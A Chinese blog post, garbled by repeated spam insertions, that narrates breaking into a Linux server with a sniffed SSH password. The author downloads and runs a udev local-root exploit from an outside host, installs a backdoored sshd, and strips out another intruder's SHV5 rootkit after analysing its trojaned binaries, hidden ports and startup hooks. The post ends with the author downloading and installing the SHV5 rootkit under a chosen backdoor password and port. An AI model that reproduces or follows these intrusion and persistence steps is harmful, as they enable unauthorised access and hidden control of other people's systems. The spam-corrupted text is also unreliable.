能够完全免费帮助的 *** 黑客-我的一台linux肉鸡的简单手工入侵检测全过程
今日发觉一台肉鸡上别人的ssh连到此外一台 *** 服务器上,纪录下了登陆密码。
[root@mail ~]# cat /tmp/sshpswd
ldc:sle823jfsGs@222.222.66.11
立即ssh上来。
[root@mail ~]# ssh ldc@222.222.66.11
ldc@222.222.66.11's password:
Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200
[ldc@localhost ldc]$ cat /etc/issue
Red Hat Enterprise Linux Server release 5 (Tikanga)
触漫1000钻推荐码
Kernel \\r on an \\m
[ldc@localhost ldc]$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 *** P Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux
是rhel5.0没升級过核心,vmsplice的local root应当能够的,但是检测了下,机触漫1000钻邀约码器挂掉,换udev的好啦。
[ldc@localhost ldc]$ mkdir .v
[ldc@localhost ldc]$ cd .v
[ldc@localhost .v]$ wget http://211.100.50.70/u.sh
--13:21:09-- http://211.100.50.70/u.sh
宸插彂鍑?HTTP 璇锋眰锛屾�鍦ㄧ瓑寰呭洖搴?.. 200 OK
闀垮害锛?366 (3.3K)[application/x-sh]
Saving to: `u.sh'
100%[=========================================触漫1000钻推荐码==================================================>]3,366 --.-K/s in 0.04s
13:21:09 (93.7 KB/s) - `u.sh' saved[3366/3366]
[ldc@localhost .v]$ ls
r00触漫1000钻推荐码t r00t.c u.sh
[ldc@localhost .v]$ chmod x u.sh
[ldc@localhost .v]$ cat /proc/net/netlink
sk Eth Pid Groups 触漫1000钻推荐码 Rmem Wmem Dump Locks
f69f8800 0 2486 00000111 0 0 &触漫1000钻推荐码nbsp; 00000000 2
f7fdae00 0 0 00000000 0 0 00000000 2
c2132200 6 触漫1000钻推荐码 0 00000000 0 0 00000000 2
f6a57a00 7 2143 00000001 0 触漫1000钻推荐码 0 00000000 2
f7caf000 7 0 00000000 0 0 触漫1000钻推荐码 00000000 2
f6a0be00 9 2143 00000000 0 0 00000000 2
f6a61200 9 1996 0000触漫1000钻推荐码0000 0 0 00000000 2
f7de1c00 9 0 00000000 0 触漫1000钻推荐码 0 00000000 2
f7d7ca00 10 0 00000000 0 0 00000000 2
f7fb3200 触漫1000钻推荐码 11 0 00000000 0 0 00000000 2
c2154200 15 476 ffffffff 触漫1000钻推荐码 0 0 00000000 2
f7fdac00 15 0 00000000 0 0 触漫1000钻推荐码 00000000 2
f7fb3000 16 0 00000000 0 0 00000000 2
c21cde00 18 0 &触漫1000钻推荐码nbsp; 00000000 0 0 00000000 2
[ldc@localhost .v]$ ps aux | grep udev
root 47触漫1000钻推荐码7 0.0 0.0 2916 1396 ? S< 12:36 0:00 / *** in/udevd -d
ldc 3462 0.0 0.0 4128 6触漫1000钻推荐码80 pts/0 S 13:00 0:00 grep udev
[ldc@localhost .v]$ sh u.sh 476
suid.c: 鍦ㄥ嚱鏁?鈥榤ain鈥?涓�細
suid.c:3: 璀﹀憡锛氶殣寮忓0鏄庝笌鍐呭缓鍑芥暟 鈥榚xecl鈥?涓嶅吋瀹
sh-触漫1000钻推荐码3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh
早已是root管理权限了。
sh-3.1# w
13:25:18 up 48 触漫1000钻推荐码 m in, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ 触漫1000钻邀请码 IDLE JCPU PCPU WHAT
ldc pts/0 100.204.107.20 13:05 0.00s 0.12s 0.06s sshd: ldc [priv]
sh-3.1# pwd
/home/ldc/.v
sh-3.1# ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006
我们先留个ssh的后门。
sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz
--13:32:08-触漫1000钻邀请码- http://211.100.50.70/openssh4.3p2.tar.gz
Connecting to 211.100.50.70:80... 宸茶繛鎺ャ€
宸插彂鍑?HTTP 璇锋眰锛屾�鍦ㄧ瓑寰呭洖搴?.. 200 OK
闀垮害锛?79990 (957K) [application/x-gzip]
Saving 触漫1000钻邀请码 to: `openssh4.3p2.tar.gz'
100%[===========================================================================================>] 979,990 1.14M/s in 0.8s
13:32:08 (1.14 触漫1000钻邀请码 MB/s) - `openssh4.3p2.tar.gz' saved [979990/979990]
sh-3.1# tar zxf openssh4.3p2.tar.gz
sh-3.1# cd openssh-4.3p2/
sh-3.1# ./configure --prefix=/usr --sysconfdir=/etc/ssh
checking for gcc..触漫1000钻邀请码. gcc
checking for C compiler default output file name... a.out
............(省略若干行)
sh-3.1# make && make install
conffile=`echo sshd_config.out | sed 's/.out$//'`; \
&触漫1000钻邀请码nbsp; /bin/sed -e 's|/etc/ssh/ssh_prng_cmds|/etc/ssh/ssh_prng_cmds|g' -e
............(省略若干行)
sh-3.1# cp ssh_config sshd_config /etc/ssh/
sh-3.1# /etc/rc.d/init.d/sshd 触漫1000钻邀请码 restart
鍋滄� sshd锛 触漫1000钻邀请码 [纭�畾]
鍚�姩 触漫1000钻邀请码 sshd锛 [纭�畾]
ok了,用我们的sshdoor登录。
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh
[root@localhost ~]# netstat -lntp
Active Internet connections 触漫1000钻邀请码 (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State 触漫1000钻邀请码 PID/Program name
tcp 0 0 127.0.0.1:2208 触漫1000钻邀请码 0.0.0.0:* LISTEN 2298/hpiod
tcp 触漫1000钻邀请码 0 0 0.0.0.0:1000 0.0.0.0:* 触漫1000钻邀请码 LISTEN 2090/rpc.statd
tcp 0 触漫1000钻邀请码 0 0.0.0.0:111 0.0.0.0:* 触漫1000钻邀请码 LISTEN 2056/portmap
tcp 0 0 0.0.0.0:21 触漫1000钻邀请码 0.0.0.0:* LISTEN 2883/vsftpd&触漫1000钻邀请码nbsp;
tcp 0 0 127.0.0.1:631 触漫1000钻邀请码 0.0.0.0:* LISTEN 2315/cupsd
tcp 0 0 127.0.0.1:25 触漫1000钻邀请码 0.0.0.0:* LISTEN 2361/sendmail: acce
tcp 触漫1000钻邀请码 0 0 127.0.0.1:2207 0.0.0.0:* &触漫1000钻邀请码nbsp; LISTEN 2303/python
总感觉这系统怪怪的,连22端口都看不到,应该替换了netstat了,先看看有没有其他被替换掉的系统文件吧。
[root@localhost ~]# rpm -qaV
S.5..UG. /bin/netstat
S.5..UG. / *** in/ifconfig
S.5....T /usr/bin/ssh-keygen
S.5....T c /etc/sysconfig/system-config-securitylevel
S.5..UG. 触漫1000钻邀请码 /usr/ *** in/lsof
.M...... /var/tux
S.5....T c /etc/inittab
S.5....T /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_dl14.map
S.5....T /触漫1000钻邀请码usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_ndl14.map
S.5....T /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_dl14.map
S.5....T /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_ndl14.map
S.5....T /usr/share/texmf-var/web2c/aleph.fmt
S.5....T /usr/share/texmf-var/web2c/amstex.fmt
S.5....T /usr/share/texmf-var/web2c/bamstex.fmt
S.5....T /usr/share/texmf-var/web2c/bplain.fmt
S.5....T /usr/share/texmf-var/web2c/cont-en.fmt
S.5....T /usr/share/texmf-var/web2c/etex.fmt
..5.触漫1000钻邀请码...T /usr/share/texmf-var/web2c/metafun.mem
S.5....T /usr/share/texmf-var/web2c/mf.base
..5....T /usr/share/texmf-var/web2c/mpost.mem
S.5....T 触漫1000钻邀请码 /usr/share/texmf-var/web2c/mptopdf.fmt
S.5....T /usr/share/texmf-var/web2c/omega.fmt
S.5....T /usr/share/texmf-var/web2c/pdfetex.fmt
S.5....T /usr/share/texmf-var/触漫1000钻邀请码web2c/pdftex.fmt
S.5....T /usr/share/texmf-var/web2c/tex.fmt
.......T c /etc/kdump.conf
S.5....T c /etc/printcap
..5....T c /etc/pki/nssdb/secmod.db
....L...触漫1000钻邀请码 c /etc/pam.d/system-auth
.M...... c /etc/cups/classes.conf
.......T c /etc/audit/auditd.conf
missing /usr/ *** in/nscd
S.5....T c /etc/sysconfig/named
.M...... /var/named
*** 5..UG. /bin/ps
*** 5..UG. /usr/bin/top
*** 5....T c /etc/sysconfig/iptables-config
S.5..UG. /usr/bin/find
prelink: /usr/lib/libGL.so.1.2.#prelink#.crFdQJ Could not trace symbol resolving
S.?..... /usr/lib/libGL.so.1.2
S.5....T c /etc/ppp/chap-secrets
S.5....T c /etc/ppp/pap-secrets
S.5....T c /etc/xml/catalog
S.5....T c /usr/share/sgml/docbook/xmlcatalog
S.5....T c /etc/ssh/ssh_config
S.5....T /usr/bin/scp
S.5....T 触漫1000钻邀请码 /usr/bin/sftp
S.5....T /usr/bin/ssh
S.5....T /usr/bin/ssh-add
*** 5...GT /usr/bin/ssh-agent
S.5....T /usr/bin/ssh-keyscan
S.5....T&触漫1000钻邀请码nbsp; /usr/share/texmf-var/fonts/map/dvips/updmap/builtin35.map
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/download35.map
S.5....T /usr/share/texmf-var/fonts/map/dvips/触漫1000钻邀请码updmap/ps2pk.map
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_pk.map
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_t1.map
S.5....T 触漫1000钻邀请码 /etc/sgml/docbook-slides.cat
S.5....T /usr/share/icons/hicolor/icon-theme.cache
S.5..UG. /bin/ls
S.5..UG. /usr/bin/dir
S.5..UG. 触漫1000钻邀请码 /usr/bin/md5sum
S.5..UG. /usr/bin/pstree
S.5....T c /etc/syslog.conf
S.5....T c /etc/ssh/sshd_config
S.5....T /usr/ *** in/sshd
missing 触漫1000钻邀请码 /var/lib/texmf/ls-R
S.5....T /etc/sgml/docbook-simple.cat
S.5....T c /etc/vsftpd/vsftpd.conf
.M...... /var/ftp/pub
S.5....T c /etc/mailcap
......G. /var/cache/samba/winbindd_privileged
.......T c /etc/mail/sendmail.cf
*** 5....T c /etc/mail/submit.cf
S.5....T c /var/log/mail/statistics
..5....T c 触漫1000钻邀请码 /usr/lib/security/classpath.security
S.5....T c /etc/sane.d/dll.conf
还好rpm没替换,看来系统的好些命令被替换了,嘿嘿,有同行在啊。
不好意思,那我就要T你下去了。下面先检查一下,当然这个系统不可靠了,我们先替换回可靠的命令:
[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir
cp: cannot remove `/usr/bin/dir': Operation not permitted
chattr加了iau了。
[root@localhost bin]# chattr -iau /usr/bin/dir
[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir
ok了。看看还触漫1000钻邀请码有什么吧:
[root@localhost chkrootkit-0.48]# lsattr /bin / *** in /usr/bin /usr/ *** in /etc| grep -e -ia
s---ia------- /bin/ps
s---ia------- /bin/ls
s---ia------- /bin/netstat
s---ia---触漫1000钻邀请码---- / *** in/ifconfig
s---ia------- / *** in/ttymon
s---ia------- / *** in/ttyload
s---ia------- /usr/bin/top
s---ia------- /usr/bin/md5sum
s---ia------- /usr/bin/pstree.x11
s---ia------- /usr/bin/find
s---ia------- /usr/bin/dir
s---ia------- /usr/bin/pstree
s---ia------- /usr/ *** in/lsof
s---ia------- /usr/ *** in/ttyload
s---ia-------触漫1000钻邀请码 /etc/sh.conf
[root@localhost bin]# chattr -iau ps ls netstat
[root@localhost bin]# rm -rf ps ls netstat
[root@localhost bin]# rz
rz waiting to receive.奫root@localhost bin]# chmod 触漫1000钻邀请码 +x ps ls netstat
[root@localhost bin]# chattr +iau ps ls netstat
同样的方式把/usr/ *** in/lsof、/usr/bin/find等都替换回来。
再用netstat看看端口吧:
[root@localhost bin]# netstat -lntp
Active Internet 触漫1000钻邀请码 connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address 触漫1000钻邀请码 State PID/Program name
tcp 0 0 127.0.0.1:2208 触漫1000钻邀请码 0.0.0.0:* LISTEN 2298/hpiod &触漫1000钻邀请码nbsp;
tcp 0 0 0.0.0.0:1000 0.触漫1000钻邀请码0.0.0:* LISTEN 2090/rpc.statd
tcp 0 0 0.0.0.0:111 0.0.0.0:* 触漫1000钻邀请码 LISTEN 2056/portmap
tcp 0 触漫1000钻邀请码 0 0.0.0.0:21 0.0.0.0:* 触漫1000钻邀请码 LISTEN 2883/vsftpd
tcp 0 0 触漫1000钻邀请码 127.0.0.1:631 0.0.0.0:* LISTEN 触漫1000钻邀请码 2315/cupsd
tcp 0 0 127.0.0.1:25 触漫1000钻邀请码 0.0.0.0:* LISTEN 2361/sendmail: acce
tcp 0 0 0.0.0.0:65530 0.0.0.0:* 触漫1000钻邀请码 LISTEN 2663/ttyload (有东东出来了吧)
tcp 0 0 触漫1000钻邀请码 127.0.0.1:2207 0.0.0.0:* LISTEN 触漫1000钻邀请码 2303/python
tcp 0 0 触漫1000钻邀请码 :::22 :::* 触漫1000钻邀请码 LISTEN 13935/sshd
现在再用chkrootkit和rkhunter查一下看看:
[root@localhost .v]# ls
chkrootkit-0.48 chkrootkit.tar.gz rkhunter rkhunter-1.2.7.tar.gz
[root@localhost .v]# cd chkrootkit-0.48/
[root@localhost chkrootkit-0.48]# ./chkrootkit
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not 触漫1000钻邀请码 infected
............(省略若干行)
Checking `ifconfig'... INFECTED
............(省略若干行)
Checking `pstree'... INFECTED
............(省略若干行)
Checking `top'... INFECTED
............(省略若干行)
Searching for t0rn's v8 defaults... Possible t0rn v8 \(or variation\) rootkit installed
............(省略若干行)
Searching for Showtee... Warning: Possible Showtee 触漫1000钻邀请码 Rootkit installed
............(省略若干行)
Searching for Romanian rootkit... /usr/include/file.h /usr/include/proc.h
............(省略若干行)
上面几行都是有问题的。
下面用rkhunter,它触漫1000钻邀请码的log存在/var/log/rkhunter.log里面
[root@localhost rkhunter]# /usr/local/bin/rkhunter -c --createlogfile
Rootkit Hunter 1.2.7 is running
Determining OS... Unknown
Warning: This operating system is not fully 触漫1000钻邀请码 supported!
Warning: Cannot find md5_not_known
All MD5 checks will be skipped! (md5sum被替换了)
............(省略若干行)
Rootkit 触漫1000钻邀请码 'SHV4'... [ Warning! 触漫1000钻邀请码 ] (SHV4)
--------------------------------------------------------------------------------
Found parts of this rootkit/trojan by checking the default files and directories
&触漫1000钻邀请码nbsp; Please inspect the available files, by running this check with the parameter
--createlogfile and check the log file (current file:触漫1000钻邀请码 /var/log/rkhunter.log).
--------------------------------------------------------------------------------
[Press <ENTER> to continue]
Rootkit 'SHV5'... 触漫1000钻邀请码 [ Warning! ] (SHV5)
-------------触漫1000钻邀请码-------------------------------------------------------------------
Found parts of this rootkit/trojan by checking the default files and directories
Please inspect the available files, by running this check with the parameter
触漫1000钻邀请码 --createlogfile and check the log file (current file: /var/log/rkhunter.log).
------------------------------------------------------触漫1000钻邀请码--------------------------
............(省略若干行)
Scanning took 84 seconds
Scan results written to logfile (/var/log/rkhunter.log)
------------------------------------------------------------触漫1000钻邀请码-----------
Do you have some problems, undetected rootkits, false positives, ideas
or suggestions?
Please e-mail me by filling in the contact form (@http://www.rootkit.nl)
----------------------触漫1000钻邀请码-------------------------------------------------
下面我们看下log:
[root@localhost rkhunter]# cat /var/log/rkhunter.log
[15:16:51] Running Rootkit Hunter 1.2.7 on localhost.localdomain
[15:16:51触漫1000钻邀请码]
Rootkit Hunter 1.2.7, Copyright 2003-2005, Michael Boelen
............(省略若干行)
[15:16:55] *** Start scan SHV4 ***
[15:16:55] - File /etc/ld.so.hash... OK. Not 触漫1000钻邀请码 found.
[15:16:55] - File /lib/libext-2.so.7... OK. Not found.
[15:16:55] - File /lib/lidps1.so... WARNING! Exists. (找到一个文件)
[15:16:55] - File /usr/ *** in/xntps... 触漫1000钻邀请码 OK. Not found.
[15:16:55] - Directory /lib/security/.config... OK. Not found.
[15:16:55] - Directory /lib/security/.config/ssh... OK. Not found.
[15:17:04] *** Start 触漫1000钻邀请码 scan SHV5 ***
[15:17:04] - File /etc/sh.conf... WARNING! Exists. (找到一个文件)
[15:17:04] - File /dev/srd0... OK. Not found.
[15:17:04] - Directory /usr/触漫1000钻邀请码lib/libsh... WARNING! Exists. (找到一个目录)
............(省略若干行)
下面手工核对下,因为工具都是对已有的检查,如果改过的,他就找不到了。
[root@localhost *** in]# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address 触漫1000钻邀请码 State PID/Program name
tcp 0 0 0.0.0.0:65530 触漫1000钻邀请码 0.0.0.0:* LISTEN 2663/ttyload
............(省略若干行)
raw 0 0 0.0.0.0:1 触漫1000钻邀请码 0.0.0.0:* 7 2679/ttymon 触漫1000钻邀请码
............(省略若干行)
发现2个不正常的
[root@localhost *** in]# ps aux|grep 2663
root 2663 0.0 0.0 2128 516 ? 触漫1000钻邀请码 Ss 12:37 0:00 / *** in/ttyload -q (原型出来了)
root 15350 0.0 0.0 4088 604 pts/0 触漫1000钻邀请码 S+ 15:21 0:00 grep 2663
[root@localhost *** in]# lsof -p 2663
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
3 2663 root cwd DIR 253,0 4096 2 /
3 2663 root 触漫1000钻邀请码 rtd DIR 253,0 4096 2 /
3 2663 root txt REG 253,0 652620 3489触漫1000钻邀请码7965 /tmp/sh-AQJ3OQYACSO (deleted) (是个压缩的)
3 2663 root mem REG 253,0 121684 8586729 /lib/ld-2.5.so
3 触漫1000钻邀请码 2663 root mem REG 253,0 1576952 8586730 /lib/libc-2.5.so
3 2663 root mem REG 253,0 101036 8586触漫1000钻邀请码743 /lib/libnsl-2.5.so
3 2663 root mem REG 253,0 15264 8586757 /lib/libutil-2.5.so
3 266触漫1000钻邀请码3 root mem REG 253,0 27836 8585303 /lib/libcrypt-2.5.so
3 2663 root 0u CHR 触漫1000钻邀请码 1,3 1517 /dev/null
3 2663 root 1u CHR 1,3 触漫1000钻邀请码 1517 /dev/null
3 2663 root 2u CHR 1,3 触漫1000钻邀请码 1517 /dev/null
3 2663 root 3u IPv4 9895 TCP *:65530 (LISTEN)
[root@localhost *** in]# lsof -p 2679
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
ttymon 2679 root cwd 触漫1000钻邀请码 DIR 253,0 4096 2 /
ttymon 2679 root rtd DIR 253,0 4096 2 /
ttymon 2679 root txt REG 253,0 93476 852119 / *** in/ttymon
ttymon 2679 root mem REG 253,0 46740 8585257 触漫1000钻邀请码 /lib/libnss_files-2.5.so
ttymon 2679 root mem REG 253,0 121684 8586729 /lib/ld-2.5.so
ttymon 2679 root mem REG 253,0 1576952 8586730 /lib/libc-触漫1000钻邀请码2.5.so
ttymon 2679 root 3u raw 9925 00000000:0001->00000000:0000 st=07
触漫1000钻邀请码监听65530端口的是个ssh后门:
[root@localhost *** in]# nc 127.0.0.1 65530
SSH-1.5-2.0.13
Protocol mi *** atch.
密码应该在:
[root@localhost *** in]# cat /etc/sh.conf
76800957735704ee3dd8ac42779db49a 触漫1000钻邀请码 -
加密了,我们再看看另外一个配置文件:
[root@localhost *** in]# cat /lib/lidps1.so
ttyload
shsniff
shp
sh ***
hide
burim
synscan
mirkforce
ttymon
sh2-power
看来是ps的配置文件。
看看另外一个进程:
[root@localhost *** in]# strings / *** in/ttymon
............(省略若干行)
Usage: %s <dst> <src> <size>触漫1000钻邀请码 <number>
Ports are set to send and receive on port 179
dst: Destination Address
src: Source Address
size: Size of packet which 触漫1000钻邀请码 should be no larger than 1024 should allow for xtra header info thru routes
num: packets
Could not resolve %s *** nut
根据这个Google了下,应该是个dos工具。感兴趣的可以编译下玩玩看看:http://www.securityfocus.com/archive/82/334848这里有。
ok我们现在进入黑客的老巢:
[root@localhost 触漫1000钻邀请码 *** in]# cd /usr/lib/libsh
[root@localhost libsh]# ls -al
total 140
drwxr-xr-x 6 root root 4096 Dec 触漫1000钻邀请码 18 2008 .
drwxr-xr-x 118 root root 69632 Jul 17 13:55 ..
drwxr-xr-x 2 root root 4096 Dec 18 2008 .backup
-rwxr-xr-x 1 触漫1000钻邀请码 122 114 1206 Apr 18 2003 .bashrc
-rwxr-xr-x 1 122 114 2000 Nov 28 2006 hide
drwxr-xr-x 2 root root 4096 触漫1000钻邀请码 Dec 18 2008 .owned
-rwxr-xr-x 1 122 114 1345 Nov 28 2006 sh ***
drwxr-xr-x 2 root root 4096 Jul 14 04:03 .sniff
drwxr-xr-x 2 gaobo gaobo 4096 Nov 28 2006 utilz
[root@localhost libsh]# ls .backup/
dir find ifconfig ls lsof md5sum netstat ps pstree 触漫1000钻邀请码 top
上面就是我们系统备份的文件,直接恢复即可。
find搜下其他的配置文件。此步骤省略。最后都找到了:
[root@localhost libsh]# find / -nouser
/lib/libsh.so/shhk.pub
/lib/libsh.so/shhk
/lib/libsh.so/shrs
............(省略若干行)
[root@localhost libsh]# cd /lib/libsh.so/
[root@localhost libsh.so]# ls
bash shdcf shhk shhk.pub shrs
这个目录是ssh的配置文件
其他的用关键字就可以了:如find 触漫1000钻邀请码 / -name "*" -exec grep -l "ttyload" {} \;
[root@localhost lib]# cat /usr/include/proc.h
3 burim
3 mirkforce
3 synscan
3 ttyload
3 shsniff
3 ttymon
3 sh ***
3 shp
3 hide
4 ttyload
[root@localhost lib]# cat /usr/include/file.h
sh.conf
libsh
.sh
system
sh ***
libsh.so
shp
shsniff
srd0
[root@localhost lib]# cat /usr/include/hosts.h
2 212.110
2 195.26
2 194.触漫1000钻邀请码143
2 62.220
3 2002
4 2002
3 6667
4 6667
3 65530
4 65530
[root@localhost lib]# cat /usr/include/log.h
mirkforce
synscan
syslog
那看看他怎么启动的:
[root@localhost lib]# cat /etc/inittab
#
# inittab This file describes how the INIT process 触漫1000钻邀请码 should set up
# the system in a certain run-level.
#
# Author: Miquel van 触漫1000钻邀请码 Smoorenburg, <miquels@drinkel.nl.mugnet.org>
# Modified for RHS Linux by Marc Ewing and Donnie Barnes
#
# Default 触漫1000钻邀请码 runlevel. The runlevels used by RHS are:
# 0 - halt (Do NOT set initdefault to this)
# 1 - Single user mode
# 2 - Multiuser, without NFS (The same as 3, if you 触漫1000钻邀请码 do not have networking)
# 3 - Full multiuser mode
# 4 - unused
# 5 - X11
# 6 - reboot (Do NOT set initdefault to this)
触漫1000钻邀请码#
id:5:initdefault:
# System initialization.
si::sysinit:/etc/rc.d/rc.sysinit
l0:0:wait:/etc/rc.d/rc 0
l1:1:wait:/etc/rc.d/rc 1
l2:2:wait:/etc/rc.d/rc 2
l3:3:wait:/etc/rc.d/rc 3
l4:4:wait:/etc/rc.d/rc 4
l5:5:wait:/etc/rc.d/rc 5
l6:6:wait:/etc/rc.d/rc 6
# Trap CTRL-ALT-DELETE
ca::ctrlaltdel:/ *** in/shutdown -t3 -r now
触漫1000钻邀请码# When our UPS tells us power has failed, assume we have a few minutes
# of power left. Schedule a shutdown for 2 minutes from now.
# This does, of course, assume you have powerd installed and your
# UPS connected and working correctly.
pf::powerfail:/ *** in/shutdown -f -h +2 "Power Failure; System Shutting Down"
# If power was restored before the shutdown kicked in, cancel it.
pr:12345:powerokwait:/ *** in/shutdown -c "Power Restored; Shutdown Cancelled"
# Run xdm in runlevel 5
x:5:respawn:/etc/X11/prefdm -nodaemon
# Loading standard ttys
0:234触漫1000钻邀请码5:once:/usr/ *** in/ttyload (在这里了)
# Run gettys in standard runlevels
1:2345:respawn:/ *** in/mingetty tty1
2:2345:respawn:/ *** in/mingetty tty2
3:2触漫1000钻邀请码345:respawn:/ *** in/mingetty tty3
4:2345:respawn:/ *** in/mingetty tty4
5:2345:respawn:/ *** in/mingetty tty5
6:2345:respawn:/ *** in/mingetty tty6
# modem getty.
# mo:235:respawn:/usr/ *** in/mgetty 触漫1000钻邀请码 -s 38400 modem
# fax getty (hylafax)
# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem
# vbox (voice box) getty
# I6:35:respawn:/usr/ *** in/vboxgetty -d /dev/ttyI6
# 触漫1000钻邀请码 I7:35:respawn:/usr/ *** in/vboxgetty -d /dev/ttyI7
# end of /etc/inittab
看看他的启动文件:
[root@localhost lib]# cat /usr/ *** in/ttyload
/ *** in/ttyload -q >/dev/null 2>&1
/ *** in/ttymon >/dev/null 触漫1000钻邀请码 2>&1
以上除了工具,我们通过手工的方式对rootkit进行了一些简单的分析,这个是个没有修改过的SHV5。以上只是一些思路,在对待入侵问题上要具体问题具体分析,这个相对简单了点。
下面我们测试下这个SHV5:
[root@localhost .v]# wget http://211.100.50.70/shv5.tar.gz
解压、安装:
[root@localhost 触漫1000钻邀请码 .v]# tar zxf shv5.tar.gz
[root@localhost .v]# cd shv5
[root@localhost shv5]# ls
bin.tgz conf.tgz lib.tgz README setup utilz.tgz
[root@localhost 触漫1000钻邀请码 shv5]# cat README
############
### shv5 ###
############
触漫1000钻邀请码 MMMMMMM MMMMMMMMMMMMMMM
MMMMMMM &触漫1000钻邀请码nbsp; MMMMMMMMMMMMMMM
&触漫1000钻邀请码nbsp; MMMMMMM 触漫1000钻邀请码 MMMMMMMMMMMMMMM
触漫1000钻邀请码 MMMMMMM MMMMMMMMMMMMMMM
触漫1000钻邀请码 MMMMMMM &触漫1000钻邀请码nbsp; MMMMMM
MMMMMM MMMMMMMMMMMMMMMM 触漫1000钻邀请码 MMMMMMM MMMMMMM MMMMMM
MMMMMMMM MMMMMMMMMMMMMMMMM 触漫1000钻邀请码 MMMMMMM MMMMMMM MMMMMMMMMMMM
MMMMMMMMM MMMMMMMMMMMMMMMMMM MMMMMMM 触漫1000钻邀请码 MMMMMMM MMMMMMMMMMMMMM
MMMMMMMMMM MMMMMMMMMMMMMMMMMM MMMMMMM MMMMMMM 触漫1000钻邀请码 MMMMMMMMMM
MMMMMMM MMMMMMM MMMMMMM MMMMMMM MMMMMMM 触漫1000钻邀请码 MMMMMMMM
MMMMMMM MMMMMMM MMMMMMM MMMMMM 触漫1000钻邀请码 MMMMMM MMMMMMMM
MMMMMMM MMMMMMM MMMMMMM MMMMMMM 触漫1000钻邀请码 MMMMMMM MMMMMMMM
MMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMMMMM 触漫1000钻邀请码 MMM MMMMMMMM
MMMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMMMM MMMMMMMMMMMMMMMM &触漫1000钻邀请码nbsp;
MMMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMM MMMMMMMMMMMMMMM
MMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMM MMMMMMMMMMMMM
MMMMMMMM MMMMMMM MMMMMMM MMMMM 触漫1000钻邀请码 MMMMMMM
DISCLAIMER:
* The purpose of these coded instructions, statements and computer
* programs is for TEST AIMS ON *** !
* Their use/misuse is at USERS OWN RISK !
* We do not take any responsibility for any harm or damage caused
* by the use of this file-package.
* This includes copying, duplicating or modifying it in any form !
* USERS WHO USE THIS CODED 触漫1000钻邀请码 INSTRUCTIONS, STATEMENTS AND COMPUTER
* PROGRAMS MUST ACCEPT ALL ABOVE STATEMENTS !
* OTHERWISE U ARE OBLIGED TO DELETE THESE FILES IMEDIATE *** !
CHANGES [shv5]:
-> - new sshd backdor with 触漫1000钻邀请码 env-settings (avoids history logging)
- The new sshd is in between 1.2.25-2.0.13 SSHD (from ssh.com)
- not so big and with new great features designed to suite shv5.
-> new 触漫1000钻邀请码 rk-dirs coz of lamme anti-shv4 release
-> new security-checks on the script
- latest flaws included (mod_ssl, samba, sendmail etc..)
-> setup-script rewriten to become more 触漫1000钻邀请码 soft (friendly)
-> added new addons (tripwire, snort ... *** er :))
-> added basic utilz on rootkit (i hate dld them on each box)
-> we use md5sum passwords now (more l33t and secure)
触漫1000钻邀请码USAGE:
-> - If u expect me to tell you how/what/if/when/where type of
- questions delete these files imediately! This is not for you!
TODO:
-> tcpdump trojan
-> 触漫1000钻邀请码 crontab trojan
-> sendmail backdoor
-> ftp backdoor
-> httpd backdoor
-> any other idea ?!?!?! < mail: pint@dosnet.info >
[root@localhost shv5]# ./触漫1000钻邀请码setup sshdoor 8585
[sh]# Installing shv5 ... this wont take long
[sh]# If u think we will patch your holes shoot yourself !
[sh]# so patch manualy and *** off!
=====================触漫1000钻邀请码=======================================================
MMMMM 触漫1000钻邀请码 MMMMMM
MMM MMMMMMMMM MMMM&触漫1000钻邀请码nbsp; MMMM MMM [*] Presenting u shv5-rootkit !
MMM MMMM MMMM MMMM MMMM MMM [*] Designed 触漫1000钻邀请码 for internal use !
MMM MMMMMMM MMMMMMMMMMMM MMM &触漫1000钻邀请码nbsp;
MMM MMMMMMMM MMMMMMMMMMMM MMM [*] brought 触漫1000钻邀请码 to you by: PinT[x]
MMM MMMM MMMM MMMM MMM [*] April ) 2003 触漫1000钻邀请码 )
MMM MMMM MMMM MMMM MMMM 触漫1000钻邀请码 MMM
MMM MMMMMMMMM MMMM 触漫1000钻邀请码 MMMM MMM [*] *** VERY PRIVATE ***
MMM 触漫1000钻邀请码 MMM [*] *** so dont distribute ***
MMMMM -C- -R- -E- -W- 触漫1000钻邀请码 MMMMMM
=====触漫1000钻邀请码=======================================================================
[sh]# backdooring started on localhost.localdomain
[sh]#
[sh]# &触漫1000钻邀请码nbsp; &触漫1000钻邀请码nbsp;
[sh]# checking for remote logging... guess not.
[sh]# checking for tripwire... guess not.
[sh]# [Installing 触漫1000钻邀请码 trojans....]
[触漫1000钻邀请码sh]# Using Password : sshdoor &触漫1000钻邀请码nbsp;
[sh]# Using ssh-port : 8585
mkdir: cannot create directory `/usr/lib/libsh': File exists
